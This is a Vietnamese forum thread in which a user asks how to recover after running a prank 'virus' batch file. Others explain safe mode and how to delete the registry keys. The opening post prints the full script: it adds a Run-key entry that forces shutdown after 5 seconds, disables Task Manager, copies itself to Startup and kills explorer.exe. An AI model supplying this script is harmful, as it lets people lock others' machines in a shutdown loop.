Virus notepad tự shut down máy

Ai chỉ em với em thấy trên mạng có cái trò virus tắt máy tính sau 5s hoặc nếu nhấp vào cái gì cũng bị tắt máy . em tạo xong lỡ dại nhấp vào . k lquan nhưng ai giúp em với .
Code ạ

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shutdown /t REG_SZ /d "shutdown.exe -f -s -t 05" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
cls
copy thelove.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
cls
taskkill /f /im explorer.exe
cls
@echo off
echo Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Nguy Hiem !!!!!!!!!
echo GOOD BYE SEE YOU AGAIN
pause
del Mr.Boss.bat

Vào safe mode xoá những cái nó ghi vào registry và startup. Đấy là window xp và windows 7.

Win10 thì cũng tìm cách vào được safe mode nhưng chắc khó vì win10 cần nhiều thao tác. Nếu đã vào được thì làm như cách safe mode bên trên.

Nếu nhanh tay bật run bằng cách nhấn cửa sổ + R và gõ lệnh shutdown -a vào cmd.

Nếu vẫn không nhanh thì khi vừa khởi động ngay lập tức log off (window + L). Sau đó bật taskmanager để khởi động lại explorer. Rồi sau đó xoá những thứ nó đã tạo ra.

Nếu không nhanh thì boot từ một thiết bị khác như usb, os khác để xoá các key, file, đánh tráo cmd.exe.

5 Likes

Dạ . em cũng thử cách nhập shutdown -a rồi nhưng k đc với lại có thể nào chỉ em cách vào chế độ safe mode k ạ . Em tạo nó lúc đầu là txt nhưng đổi thành đuôi .bat ạ

E sài win 7 ạ . mong được giúp

Keyword: enter safe mode on windows 7

4 Likes

Win7 thì sau khi máy bắt đầu khởi động qua bios thì ấn liên tục F8 sẽ vào chế độ chọn safe mode.

6 Likes

Em thấy trên google nó chỉ cách giữ ạ

Giữ cũng được, như nhau mà.

3 Likes

Ok em vào r h vào đâu nữa ạ

Xem cái file bat nó ghi nó copy những cái gì vào đâu thì vào đó xoá đi thôi.
Nó ghi 2 key vào registry thì vào registry theo đường dẫn nó ghi trong file mà xoá key đó. Vào registry bằng cách gõ regedit vào cửa sổ run.
Nó copy 1 file bat vào startup thì cũng vào đường dẫn đó xoá.

2 Likes

Nó ghi copy vào đường dẫn đó . nhưng tới lúc em vào thì đó là thư mục rỗng . Em nghĩ là nó ghi vậy thôi chứ không làm gì đâu , em c mơn a nhìu ạ

Vì bạn chỉ chép mã mà, mấy tập tin kia (thelove.batMr.Boss.bat) bạn đâu có tải về, đúng không?
Giờ thì chỉ cần xóa 2 khóa trong regedit thôi.

4 Likes

A ơi e dùng win 10 làm sao để tắt virus tắtmay 5s ạ

1 Like

A post was merged into an existing topic: Topic lưu trữ các post off-topic - version 3

83% thành viên diễn đàn không hỏi bài tập, còn bạn thì sao?